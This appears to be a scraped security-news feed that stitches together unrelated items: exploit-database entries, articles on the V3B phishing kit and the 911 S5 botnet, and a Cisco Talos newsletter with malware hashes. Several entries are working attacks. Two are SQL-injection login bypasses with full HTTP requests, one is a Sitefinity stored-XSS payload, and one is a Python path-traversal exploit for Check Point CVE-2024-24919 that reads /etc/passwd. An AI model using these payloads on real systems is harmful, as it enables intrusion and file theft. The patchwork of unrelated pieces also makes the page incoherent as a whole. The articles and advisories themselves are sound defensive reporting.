When a drug kingpin named Microsoft tried to seize control of an encrypted phone company for criminals, he was playing right into its real owners’ hands.

Inside the Biggest FBI Sting Operation in History

Employee and Visitor Gate Pass Logging System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Employee and Visitor Gate Pass Logging System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Furkan Eren Tetik# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Employee and Visitor Gate Pass Logging System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/employee_gatepass/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /employee_gatepass/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 43sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/employee_gatepass/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=furkan--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:01:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Employee And Visitor Gate Pass Logging System 1.0 SQL Injection

Sitefinity version 15.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS)# Date: 2023-12-05# Exploit Author: Aldi Saputra Wahyudi# Vendor Homepage: https://www.progress.com/sitefinity-cms# Version: < 15.0.0# Tested on: Windows/Linux# CVE : CVE-2023-27636# Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor# Steps To Reproduce:Attacker as lower privilegeVictim as Higher privilege1. Login as an Attacker2. Go to the function using the SF Editor, go to the news page as example3. Create or Edit news item4. On the content form, insert the XSS payload as HTML5. After the payload is inserted, click on the content form (just click) and publish or save6. If the victim visits the page with XSS payload, XSS will be triggeredPayload: <noalert><iframe src="javascript:alert(document.domain);">

Sitefinity 15.0 Cross Site Scripting

By Deeba Ahmed
New phishing kit targets European bank users! Protect yourself from V3B attacks designed to steal your logins and…
This is a post from HackRead.com Read the original post: New V3B Phishing Kit Steals Logins and OTPs from EU Banking Users

New phishing kit targets European bank users! Protect yourself from V3B attacks designed to steal your logins and one-time passwords (OTPs). Learn how to spot these scams and keep your finances safe.

Cybercriminals are constantly developing new tactics to steal financial information from unsuspecting victims. A recent report by cybersecurity firm Resecurity highlights a dangerous new threat – the V3B phishing kit – specifically targeting European banking customers.

****What is a Phishing Kit?****

These are pre-made toolkits readily available on the dark web, allowing even novice cybercriminals to launch sophisticated phishing attacks by providing pre-designed email templates, fake login pages, and even malware.

****The V3B Phishing Threat****

According to Resecurity, a cybercriminal group is selling a sophisticated **phishing kit** called “V3B” on Telegram. A group member, using the alias “Vssrtje,” launched operations in March 2023, and the kit is priced between $130-$450 per month.

It has already attracted over 1,255 skilled cybercriminals specializing in fraud, including social engineering, SIM swapping schemes, and banking and credit card fraud. V3B supports targeted attacks on over 54 EU (European Union) financial institutions including the following:

*   **Italy**
*   **Ireland**
*   **Austria**
*   **France**
*   **Finland**
*   **Greece**
*   **Belgium**
*   **Germany**
*   **Netherlands**
*   **Luxembourg**

****Key Features****

The kit can intercept sensitive information, including credentials and OTP (one-time password) codes, using social engineering tactics. It has two components: a scenario-based credential interception system (V3B) and online banking authorization pages. 

Built on a customized CMS, the kit features templates in multiple languages, including Finnish, French, and German, mimicking the authentication and verification processes of the EU’s online banking and e-commerce systems. In addition, it has advanced features like updated tokens, anti-bot measures, mobile and desktop interfaces, live chat, and OTP/TAN/2FA support. 

Through real-time interaction with victims, the kit allows fraudsters to orchestrate specific actions, gain unauthorized access, or facilitate fraudulent transactions. It triggers a request for QR Code, a new twist on QR code phishing, using a browser extension to grab codes from a service’s site and pipe them to a phishing site. The kit also uses PhotoTAN and Smart ID support, a popular method of authentication for mobile banking, to manipulate the victim’s actions.

****How to Stay Safe?****

To protect yourself from V3B phishing attacks, verify the sender’s email address carefully, avoid entering information on unfamiliar websites, and enable multi-factor authentication (**MFA**) as an extra layer of security. Staying vigilant and following these security best practices can significantly reduce your chances of falling victim to V3B phishing attacks or similar scams.

1.  EvilProxy Phishing Kit Hits 100+ Firms, Bypasses MFA
2.  BlackLotus UEFI bootkit Can Bypass Secure Boot on Windows
3.  Meet MEWKit, a tricky phishing attack draining Ethereum wallets
4.  Telekopye Toolkit Used as Telegram Bot to Scam Marketplace Users
5.  NPM Typosquatting Attack Deploys r77 Rootkit via Legitimate Package

New V3B Phishing Kit Steals Logins and OTPs from EU Banking Users

A list of topics we covered in the week of May 27 to June 2 of 2024

June 1, 2024 - Live Nation has confirmed what everyone has been speculating on for the last week: Ticketmaster has suffered a data breach.

May 31, 2024 - This post will help users find out if their Windows device has been added to the 911 S5 botnet by a malicious VPN application

May 30, 2024 - Scammers and other cybercriminals love to use our name to defraud their victims. Here's what to look out for.

May 30, 2024 - A database has been put up for sale that allegedly contains the data of 560 million Ticketmaster users. But is it real?

May 29, 2024 - This post explains how to disable various location services on Android devices.

 A week in security (May 27 &#8211; June 2) 

This post will help users find out if their Windows device has been added to the 911 S5 botnet by a malicious VPN application

On May 29, 2024, the US Department of Justice (DOJ) announced it had dismantled what was likely the world’s largest botnet ever. This botnet, called “911 S5,” infected systems at over 19 million IP addresses across more than 190 countries. The main sources of income for the operators, who stole a billions of dollars across a decade, came from committing pandemic and unemployment fraud, and by selling access to child exploitation materials.

The botnet operator generated millions of dollars by offering cybercriminals access to these infected IP addresses. As part of this operation, a Chinese national, YunHe Wang, was arrested. Wang is reportedly the proprietor of the popular service.

Of the infected Windows devices, 613,841 IP addresses were located in the United States. The DOJ also called the botnet a residential proxy service. Residential proxy networks allow someone in control to rent out a residential IP address which then can be used as a relay for their internet communications. This allows them to hide their true location behind the residential proxy. Cybercriminals used this service to engage in cyberattacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.

To set up this botnet, Wang and his associates provided users with free, illegitimate VPN applications that were created to connect to the 911 S5 service. Unaware of the proxy backdoor, once users downloaded and installed these VPN applications, they unknowingly became part of the 911 S5 botnet.

Sometimes the VPN applications were bundled with games and other software and installed without user consent.

For this reason, the FBI has published a public service announcement (PSA) to help users find out if they have been affected by this botnet.

Users can start by going over this list of malicious VPN applications associated with the 911 S5 botnet:

*   MaskVPN
*   DewVPN
*   PaladinVPN
*   ProxyGate
*   ShieldVPN
*   ShineVPN

If you have one of these VPN applications installed, sometimes you can find an uninstaller located under the Start menu option of the VPN application. If present, you can use that uninstall option.

If the application doesn’t present you with an uninstall option, then follow the steps below to attempt to uninstall the application:

*   Click on the Start menu (Windows button) and type “Add or remove programs” to bring up the “Add and Remove Programs” menu.
*   Search for the name of the malicious VPN application.
*   Once you find the application in the list, click on the application name, and select the “Uninstall” option.

Once you have uninstalled the application, you will want to make sure it’s no longer active. To do that, open the Windows Task manager. Press Control+Alt+Delete on the keyboard and select the “Task Manager” option or right-click on the Start menu (Windows button) and select the “Task Manager” option.

In Task Manager look under the “Process” tab for the following processes:

*   MaskVPN (mask\_svc.exe)
*   DewVPN (dew\_svc.exe)
*   PaladinVPN (pldsvc.exe)
*   ProxyGate (proxygate.exe, cloud.exe)
*   ShieldVPN (shieldsvc.exe)
*   ShineVPN (shsvc.exe)

_Example by FBI showing processes associated with ShieldVPN in Task Manager_

If found, select the service related to one of the identified malicious software applications running in the process tab and select the option “End task” to attempt to stop the process from running.

Or, download Malwarebytes Premium (there is a free trial) and run a scan.

Whether you’re using the free or paid version of the app, you can manually run a scan to check for threats on your device. 

1.  Open the app.
2.  On the main dashboard, click the **Scan** button.
3.  A progress page appears while the scan runs.
4.  After the scan finishes, it displays the Threat scan summary.
    *   **If the scan detected no threats:** Click **Done**.
    *   **If the scan detected threats on your device:** Review the threats found on your computer. From here, you can manually quarantine threats by selecting a detection and clicking **Quarantine**.
5.  Click **View Report** or **View Scan Report** to see a history of prior scans. After viewing the threat report, close the scanner window.

If neither of these options, including the Malwarebytes scan, resolve the problem, the FBI has more elaborate instructions. You can also contact the Malwarebytes Support team to assist you.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 How to tell if a VPN app added your Windows device to a botnet 

Online Payment Hub System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Online Payment Hub System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Hamit Avşar# Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/oph/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /oph/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 42sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/oph/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=hamit--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:15:28 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Online Payment Hub System 1.0 SQL Injection

Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

    # Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___    / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \  | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, | | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / /   \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/                                                                                                                                                                                                                                                                                                                                                                 Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/    ''')   def exploit(url, path):  url = url + '/clients/MyCRL'  data =   "aCSHELL/../../../../../../../../../../.."+ path  headers = {            'Connection': 'keep-alive',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'  }  s = Session()  req = Request('POST', url, data=data, headers=headers)  prepped = req.prepare()  #del prepped.headers['Content-Type']  resp = s.send(prepped,      verify=False,      timeout=15  )    print(prepped.headers)  print(url)  print(resp.headers)  print(resp.status_code)if __name__ == '__main__':    title()    if(len(sys.argv) < 3):      print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))      print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))            exit(0)    else:      exploit(sys.argv[1],sys.argv[2])

Check Point Security Gateway Information Disclosure

Since February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are common among other banking trojans coming out of Brazil.

New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

Drivers from New York to Georgia and Pennsylvania have received these types of texts with equally convincing phishing text messages and lure pages.

Thursday, May 30, 2024 14:00

My wife (no stranger to weird types of scams) recently received a fake text message from someone claiming to be New Jersey’s E-ZPass program saying that she had an outstanding balance from highway tolls that she owed, prompting her to visit a site so she could pay and avoid additional fines. 

There was plenty of reason to believe this was a legitimate ask. Her family is from New Jersey, so we make frequent trips there, paying $20-plus in tolls along the way. We had also just completed a trip from there a few weeks prior (though I’m not sure if this was a coincidence to the timing of the spam text or not), and we both have E-ZPass accounts. 

For the uninitiated, or anyone who lives in a country where taxes are paid as normal and therefore pay for appropriate road repairs, E-ZPass is a small device drivers in more than a dozen countries in the U.S. can register for so they can automatically pay tolls along highways rather than having to stop and use cash or coins, or spending a few extra minutes manually processing a transaction.  

Each state or city has its own agencies that deal with E-ZPass, each with its own payment processing system and website. For this case with New Jersey, the phishing site the scammers set up was shockingly convincing and looked remarkably similar to the legitimate New Jersey E-ZPass website.  

The phishing website set up by scammers (left) meant to look like the legitimate New Jersey E-ZPass website (right).

Once we logged into our legitimate E-ZPass account to check to make sure we had, in fact, paid all the appropriate tolls, I alerted my team about this scam, and we appropriately blocked the phishing URL in question in Cisco Secure products.  

Since this victory and foray into threat hunting, I have learned that this is a problem everywhere, not just for New Jersey drivers. 

Since this experience, E-ZPass has sent out an alert in all the states they operate in warning about these types of scams. Drivers from New York to Georgia and Pennsylvania have received these types of texts with equally convincing phishing text messages and lure pages.  

It’s unclear what the adversaries’ goals are in this case, but it’s probably safe to assume they’re looking to collect users’ credit card information after they go in to pay the alleged overdue toll. They could also be collecting E-ZPass login information to collect further data about the drivers. 

In April, the FBI also warned of SMS phishing scams, in which adversaries pretended to be toll collection services from three different U.S. states. SunPass, the equivalent to E-ZPass in Florida, also alerted about similar scams around the same time as these E-ZPass scams started being reported. And in March, the FasTrak service in California warned of the same problems.  

My hunch is that these types of services are being impersonated all over the U.S. for several reasons — thousands of drivers use these services (especially in states with a high commuter population), which makes it likely that whoever receives the text will be familiar with these devices and will have recently driven on a highway that makes drivers pay tolls. The amounts they’re asking for are also small, no more than $5 USD, so it doesn’t set off any immediate alarm bells, unlike similar scams that ask for hundreds of dollars for health care services. The requests coming through as SMS messages also make the targets more likely to open them on their mobile devices, which may not have the same security in place as a laptop or managed company device. 

No individual state or local agency is immune from this style of scam, so if you’re ever in doubt of receiving a text like this, it’s best to call your area government program in question and ask them about any suspicious activity before clicking on any links or submitting payment information. 

**The one big thing **

Cisco Talos’ Vulnerability Research team has helped to disclose and patch more than 20 vulnerabilities over the past three weeks, including two in the popular Adobe Acrobat Reader software. Acrobat, one of the most popular PDF readers currently available, contains two out-of-bounds read vulnerabilities that could lead to the exposure of sensitive contents of arbitrary memory in the application. There are also eight vulnerabilities in a popular line of PLC CPU modules commonly used in automated environments. We have more detailed information in our full Vulnerability Roundup from this week. 

**Why do I care? **

Several vulnerabilities were identified in the AutomationDirect P3 line of CPU modules. The P3-550E is the most recent CPU module released in the Productivity3000 line of Programmable Automation Controllers from AutomationDirect. The device communicates remotely via ethernet, serial and USB and exposes a variety of control services, including MQTT, Modbus, ENIP and the engineering workstation protocol DirectNET. Four of the vulnerabilities found in these PLC CPU modules received a CVSS security score of 9.8 out of 10, making them particularly notable. TALOS-2024-1942 (CVE-2024-21785) is a leftover debug code vulnerability that allow an adversary who can communicate to the device over ModbusRTU to enable the device’s diagnostic interface without any other knowledge of the target device. There is also TALOS-2024-1943 (CVE-2024-23601) which can lead to remote code execution if the attacker sends a specially crafted file to the targeted device and TALOS-2024-1939 (CVE-2024-24963 and CVE-2024-24962) which are stack-based buffer overflows that can also lead to remote code execution if the attacker sends a specially formatted packet to the device. 

**So now what? **

Each of the vendors mentioned in this week’s Vulnerability Roundup have released patches for affected products, and users should download these patches as soon as possible. For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Top security headlines of the week **

**Security researchers are warning about the dangers of a new AI “Recall” feature for Microsoft Windows 11.** Microsoft recently announced a new update, that will allow a computer to remember past actions taken by the user and then use a simple search to query that information (ex., “Where did I store that document again?”). However, because Recall essentially takes individual snapshots of a machine and stores them locally, there are several security concerns. If an adversary were to infect a targeted machine with information-stealing malware, they could steal important databases stored locally and anything stored by Windows Recall. Recall also contains what are essentially keylogging functions, leaving the door open for adversaries to easily steal login credentials or other personal information that had been entered into the machine over the previous three months. The United Kingdom’s data protection agency has already contacted Microsoft inquiring about the way this information is stored and used, and they’ve asked for assurance that users’ data will be properly safeguarded and not used by the company.  Other unauthorized users may be able to access and query Recall’s information, should they obtain physical access to the device. (Bleeping Computer, Double Pulsar) 

**Popular spyware app pcTattletale had to completely shut down after a data breach and having its website seized.** The company that operates the app, which quietly and remotely tracks users’ activities on infected machines and takes screenshots, had its website defaced earlier this week by a hacker, along with a dump of data belonging to alleged pcTattletale customers and victims. Just days before the disruption, reports surfaced that the software was quietly installed on computers that handled the check-in process at least three Wyndham hotels across the U.S. A vulnerability in the platform could have allowed anyone on the internet who exploits it can download screenshots captured by the software directly from its servers. pcTattletale advertised itself as software that could allow anyone to control it remotely and view the target’s Android or Windows devices and their data from anywhere in the world. The founder of the spyware said that, after the data breach, the company was “out of business and completely done.” The now-defunct app had 138,000 registered customers, according to data breach notification website Have I Been Pwned. (TechCrunch, TechCrunch (again)) 

**Ascension hospitals across the U.S. still have to delay patient care more than three weeks after a cyber attack.** As of earlier this week, the national hospital system is still experiencing network disruptions, forcing staff to write care notes by hand and deliver orders for tests and prescriptions in person. Patients have also been unable to use their online portals to contact their doctors or view their medical records. Ascension is one of the largest health systems in the U.S., with more than 140 hospitals across the country. It first alerted patients and doctors about “unusual activity” on May 8, and there is no timeline for when services will be fully restored. News reports indicate that the disruption is a ransomware attack that can be attributed to the BlackBasta threat actor, which has links to Russia. Large health care organizations have increasingly become the target of ransomware attacks, with a previous campaign targeting Change Healthcare earlier this year disrupting payments to medical providers across the U.S. for weeks. (NPR, The New York Times) 

**Can’t get enough Talos? **

*   Attackers are probing Check Point Remote Access VPN devices 
*   Out-of-bounds reads in Adobe Acrobat; Foxit PDF Reader contains vulnerability that could lead to SYSTEM-level privileges 
*   New Generative AI category added to Talos reputation services 
*   From trust to trickery: Brand impersonation over the email attack vector 

**Upcoming events where you can find Talos **

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_ 

> _B_ill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.

**_AREA41_** **_(June 6 – 7)_** 

_Zurich, Switzerland_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches._ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** PUA.Win.Dropper.Generic::1201 

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c       
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c       
**Typical Filename:** AAct.exe       
**Claimed Product:** N/A         
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

Tag

#windows